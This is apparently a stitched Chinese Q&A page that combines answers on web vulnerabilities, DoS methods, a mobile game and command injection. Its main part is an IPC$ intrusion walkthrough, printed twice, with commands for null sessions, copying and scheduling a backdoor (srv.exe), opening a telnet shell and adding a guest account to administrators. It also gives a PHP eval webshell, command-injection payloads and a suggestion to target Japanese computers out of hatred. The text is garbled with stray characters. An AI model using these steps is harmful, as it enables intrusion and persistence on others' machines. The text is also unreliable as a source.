Ⅰ 常見的網路安全漏洞有哪些
第一:注入漏洞
由於其普遍性和嚴重性,注入漏洞位居漏洞排名第一位。常見的注入漏洞包括SQL、LDAP、OS命令、ORM和OGML。用戶可以通過任何輸入點輸入構建的惡意代碼,如果應用程序沒有嚴格過濾用戶的輸入,一旦輸入的惡意代碼作為命令或者查詢的一部分被發送到解析器,就可能導致注入漏洞。
第二:跨站腳本漏洞
XSS漏洞的全稱是跨站點腳本漏洞。XSS漏洞是網路應用程序中常見的安全漏洞,它允許用戶將惡意代碼植入網頁,當其他用戶訪問此頁面時,植入的惡意腳本將在其他用戶的客戶端執行。危害有很多,客戶端用戶的信息可以通過XSS漏洞獲取,比如用戶登錄的Cookie信息;信息可以通過XSS蝸牛傳播;木馬可以植入客戶端;可以結合其他漏洞攻擊伺服器,並在伺服器中植入特洛伊木馬。
第三、文件上傳漏洞
造成文件上傳漏洞的主要原因是應用程序中有上傳功能,但上傳的文件沒有通過嚴格的合法性檢查或者檢查功能有缺陷,導致木馬文件上傳到伺服器。文件上傳漏洞危害極大,因為惡意代碼可以直接上傳到伺服器,可能造成伺服器網頁修改、網站暫停、伺服器遠程式控制制、後門安裝等嚴重後果。
第四、文件包含漏洞
文件包含漏洞中包含的文件參數沒有過濾或嚴格定義,參數可以由用戶控制,可能包含意外文件。如果文件中存在惡意代碼,無論文件是什麼後綴類型,文件中的惡意代碼都會被解析執行,導致文件包含漏洞。
第五、命令執行漏洞
應用程序的某些函數需要調用可以執行系統命令的函數。如果這些功能或者功能的參數可以被用戶控制,那麼惡意的命令就有可能通過命令連接器拼接成正常的功能,從而可以隨意執行系統命令。這就是命令執行漏洞,屬於高風險漏洞之一。
Ⅱ 什麼是DOS攻擊,DOS攻擊的命令有哪些,攻擊的方式有哪些
DOS,是Denial of Service的簡稱,即拒絕服務,不是DOS操作系統,造成DOS的攻擊行為被稱為DOS攻擊,其目的是使計算機或網路無法提供正常的服務。最常見的DOS攻擊有計算機網路帶寬攻擊和連通性攻擊。
DOS攻擊類型有哪些?常見方式如下:
SYN FLOOD
利用伺服器的連接緩沖區,利用特殊的程序,設置TCP的header,向伺服器端不斷地成倍發送只有SYN標志的TCP連接請求。當伺服器接收的時候,都認為是沒有建立起來的連接請求,於是為這些請求建立會話,排到緩沖區隊列中。
如果SYN請求超過了伺服器能容納的限度,緩沖區隊列滿,那麼伺服器就不再接收新的請求;其他合法用戶的連接都被拒絕,可以持續SYN請求發送,直到緩沖區中都是自己的只有SYN標志的請求。
IP欺騙
DOS攻擊這種攻擊利用RST位來實現的,比如現在有一個合法用戶已經同伺服器建立正常連接,攻擊者構造攻擊的TCP數據,偽裝自己的IP為正常ip,向伺服器發送一個帶有RST位的TCP數據段。伺服器接收到這樣的數據後,認為從合法用戶發送的連接有錯誤,就會清空緩沖區中建立好的連接。這時,如果合法用戶再發送合法數據,伺服器就已經沒有這樣的連接了,該用戶必須重新開始建立連接。
帶寬DOS攻擊
如果連接帶寬足夠大而伺服器又不是很大,可以發送請求,來消耗伺服器的緩沖區消耗伺服器的帶寬。這種攻擊就是人多力量大,配合上SYN一起實施DOS,威力巨大。
自身消耗的DOS攻擊
這種是老式的攻擊手法。說老式,是因為老式的系統有這樣的自身BUG,比如win 95這樣的系統。這種DOS攻擊就是把請求客戶端IP和埠弄成主機的IP埠相同,發送給主機。使得主機給自己發送TCP請求和連接。這種主機的漏洞會很快地把資源消耗光,直接導致宕機。這種偽裝對一些身份認證系統威脅還是很大的。
塞滿伺服器的硬碟
如果伺服器可以沒有限制地執行寫操作,那麼都能成為塞滿硬碟造成DOS攻擊的途徑:
1、發送垃圾郵件:一般公司的伺服器可能把郵件伺服器和Web伺服器都放在一起,破壞者可以發送大量的垃圾郵件,這些郵件可能都塞在一個郵件隊列中或者就是壞郵件隊列中,直到郵箱被撐破或者把硬碟塞滿。
2、讓日誌記錄滿:入侵者可以構造大量的錯誤信息發送出來,伺服器記錄這些錯誤,可能就造成日誌文件非常龐大,甚至會塞滿硬碟。同時會讓管理員痛苦地面對大量的日誌,甚至就不能發現入侵者真正的入侵途徑。
3、向匿名FTP塞垃圾文件,這樣也會塞滿硬碟空間。
Ⅲ 《海島奇兵》如何在煙霧彈里執行攻擊指令
煙霧彈作用:
釋放煙霧彈迷惑敵人,讓處於迷霧中的我方部隊不受地方防禦設施的攻擊。
煙霧彈說明:
煙霧彈影響的是射擊源,部隊在煙霧彈里不受攻擊同時也不能攻擊,但是醫療兵在煙霧彈里可以氏激繼續工作。煙霧彈里的防禦繼續工作,煙霧彈只針對部隊,作用就是隱藏和休息。
煙霧彈覆蓋:者核跡
一直以來很多同學都在關心著煙霧彈到底能夠隱藏多少士兵、或者坦克什麼的,官方數據顯示,一級煙霧可以掩飾36個單位,但是據相關玩家統計,貌似一 級煙霧可以隱藏42個野人,也就是說覆蓋面積42個單位,但是對於大件的或者小件的是不是會減少增加呢,這個小編沒有嘗試,同學們可以測試下。
煙霧彈用法:
煙霧持續時間結合煙霧覆蓋范圍,這個多次嘗試就能慢慢把握,小編口乾舌燥也是說不明首並白的。
目前最為流行的就是煙霧配合野人的打法,一路煙霧直搗大本,加上野人的高傷害和自身回血能力,偷襲屢屢得手,也許這就是目前野人流打法盛行的原因之一。
Ⅳ 黑客DOS命令或其它命令入侵他人電腦的具體步驟
IPC$入侵
一 嘮叨一下:
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
因此滑手我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不消讓中爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
四 ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某拿山個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445埠:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
五 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
六 如何打開目標的IPC$(此段引自相關文章)
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。
七 如何防範ipc$入侵
1禁止空連接進行枚舉(此操作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼,防止通過ipc$窮舉密碼
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)
八 相關命令
1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
4)刪除一個ipc$連接
net use \\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
十 總結:
關於ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論.
最後,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,並不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什麼?為什麼?因為我討厭日本,沒別的)
Ⅳ 常見WEB攻擊之命令注入
即 Command Injection。是指通過提交惡意構造的參數破壞命令語句結構,從而達到執行惡意命令的目的。
在Web應用中,有時候會用到一些命令執行的函數,如php中system、exec、shell_exec等,當對用戶輸入的命令沒有進行限制或者過濾不嚴導致用戶可以執行任意命令時,就會造成命令執行漏洞。
黑客將構造好的命令發送給web伺服器,伺服器根據拼接命令執行注入的命令,最後講結果顯示給黑客。
以DVWA為例,下面使用ping命令測試IP,正常輸入一個IP或者域名會返回一個正常的返回結果。
當輸入惡意構造的語句 www..com && netstat -an,會把後面的語句也給執行了:
執行結果:
PHP的常見命令執行函數:
system(),exec(),shell_exec(),passthru()
1、system()
system — 執行外部程序,並且顯示輸出
常規用法:
使用PHP執行:
php test1.php www..com
exec — 執行一個外部程序
3、shell_exec()
shell_exec — 通過 shell 環境執行命令,並且將完整的輸出以字元串的方式返回。
4、passthru()
passthru() 函數與 exec() 函數類似,執行外部程序並且顯示原始輸出。
Windows:
用^轉義<
如果加上單引號會寫不進去,如果加雙引號會把雙引號一起寫進去,所以要用^轉義<
linux:
linux下需要用來轉義<,不過很多php都默認開啟gpc,可以先用16進制轉換一句話再用xxd命令把16進制還原.
<?php eval($_POST[pass]);>
轉換為16進制:
由於我用的是Linux,所以使用payload寫入一句話:
寫入成功:
1、採用白名單,或使用正則表達式進行過濾。
2、不要讓用戶可以直接控制eval()、system、exec、shell_exec等函數的參數。
3、在進入執行命令函數和方法前,對變數進行過濾,對敏感字元進行轉義。
Ⅵ 不屬於命令執行漏洞的危害
不屬於命令執行漏洞的危害是對伺服器造成大流量攻擊。命令執行漏洞的危害是反彈控制整個網站,繼承WEB服務程序的許可權,讀寫文件。命芹好令執行定義基本定義命令執行漏洞是指攻擊者可以隨意執行系統命塌首衫令,分為遠程命令執行(遠程代碼執行)和系統命令執行兩團腔類。
Ⅶ cmd攻擊別人電腦命令,
無法攻擊別人電腦,但是可以訪問別人電腦。
如下參考:
1.在桌面上,單擊「開始」,單擊「運行」。
Ⅷ 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有
一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
Ⅸ 命令執行漏洞
命令執行漏洞的成因:
腳本語言(如PHP )優點是簡潔、方便,但也伴隨著一些問題,如速度慢、無法接觸系統底層,如果我們開發的應用(特別是企業級的一些應用)需要-些除去web的特殊功能時,就需要調用一些外部程序。當應用需要調用一些外部程序去處理內容的情況下, 就會用到些執行系統命令桐漏的函數。如PHP中褲岩的system、exec. shell exec等,當用戶可以控制命令執行函數中的參數時,將可以注入惡局純爛意系統命令到正常命令中,造成命令執行攻擊。
PHP中調用外部程序的主要有以下函數:
system
exec
shell_exec
passthru
popen
proc_popen
全局搜索這些函數,觀察是否可以控制。
命令執行漏洞的防禦:
可控點為待執行的程序
<?php
$arg = $_GET[『cmd』];
if($arg){
system(「$arg」);
}
?>
[if !supportLists]l [endif]/?cmd=id
[if !supportLists]l [endif]/?cmd=pwd
[if !supportLists]l [endif]/?cmd=ifconfig
可控點是傳入程序的整個參數(無引號包裹)
<?php
$arg = $_GET[『cmd』];
if($arg){
system(「ping -c 3 $arg」);
}
?>
我們能夠控制的點是程序的整個參數,我們可以直接用&&或|等等,利用與、或、管道命令來執行其他命令。
/?cmd=127.0.0.1| ifconfig
可控點是某個參數的值(有雙引號包裹)
<?php
$arg = $_GET[『cmd』];
if($arg){
system(「ls -al \」$arg\」」);
}
?>
閉合雙引號。
/?cmd=/home」 | ifconfig;」
可控點是某個參數的值(有單引號包裹)
<?php
$arg = $_GET[『cmd』];
if($arg){
system(「ls -al 『$arg』 」);
}
?>
在單引號內的話,只是一個字元串,因此想要執行命令必須閉合單引號。
/cmd?=/home』 |ifconfig』
命令執行漏洞的防禦:
1、能使用腳本解決的工作,不要調用其他程序處理。盡量少用執行命令的函數,並在disable functions中禁用之。
2、對於可控點是程序參數的情況,使用escapeshellcmd函數進行過濾。
3、對於可控點是程序參數的值的情況,使用escapeshellarg函數進行過濾。
4、參數的值盡量使用引號包裹,並在拼接前調用addslashes進行轉義。
Ⅹ 除了exploit命令,還有什麼命令也可以執行攻擊
在Linux系統中,除了exploit命令外,還有以下命令也可以執行攻擊:
1、nmap:一個網路掃描工具,可以掃描目標主機的開放埠和漏洞。
2、Metasploit Framework:一個開源的漏洞利用框架,可以通過模塊化的方式執行多種攻擊。
3、Hydra:一個強大的密碼破解工具,可以暴力破解各種服務的用戶名和密碼。燃侍銀
4、Wireshark:一個網路抓包分析工具,可以抓取網路數據包並對其進行分析,包括敏感信息的泄漏等。
5、Aircrack-ng:一個無談基線網路安全工具,可以破解無線網路密碼、監聽網路流量等。
需要注意的是,這些工具大多數都是為了測試和加強系統安全而設計的,使用時需要遵皮宴守法律法規,不要用於非法目的。